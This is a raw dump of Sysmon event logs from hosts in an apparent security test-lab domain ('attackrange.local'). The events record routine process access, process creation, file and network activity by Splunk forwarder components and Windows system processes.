08:05:31.816{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B5CB-615A-AC01-00000000FD01}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000084073Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.816{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B5CB-615A-AC01-00000000FD01}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000084072Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.817{2FDD8D40-B5CB-615A-AC01-00000000FD01}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000084071Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:29.470{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50213-false10.0.1.12-8089- 23542300x800000000000000084070Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.722{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24F9948914F12DF2BC3C9FF9FBF8E5DB,SHA256=8DCBB3B6ECC16D5170F6EFE6B494266C182099C4EBFE23736A13A5A4CD854147,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108613Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:31.554{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB24BE8719AAF08DB7B4988DCC024245,SHA256=DBFF136BC80F877DA88E85C7754E6EAD62804264A75F34F8A3B1448DB5DA9C6B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000084069Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.316{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B5CB-615A-AB01-00000000FD01}784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084068Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.316{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084067Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.316{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084066Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.316{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084065Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.316{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084064Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.316{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084063Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.316{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084062Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.316{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084061Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.316{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084060Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.316{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084059Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.316{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B5CB-615A-AB01-00000000FD01}784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000084058Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.316{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B5CB-615A-AB01-00000000FD01}784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000084057Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.317{2FDD8D40-B5CB-615A-AB01-00000000FD01}784C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000084101Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.769{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B5CC-615A-AD01-00000000FD01}1668C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084100Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.769{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084099Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.769{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084098Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.769{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084097Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.769{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084096Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.769{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084095Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.769{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084094Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.769{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084093Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:32.769{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084092Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 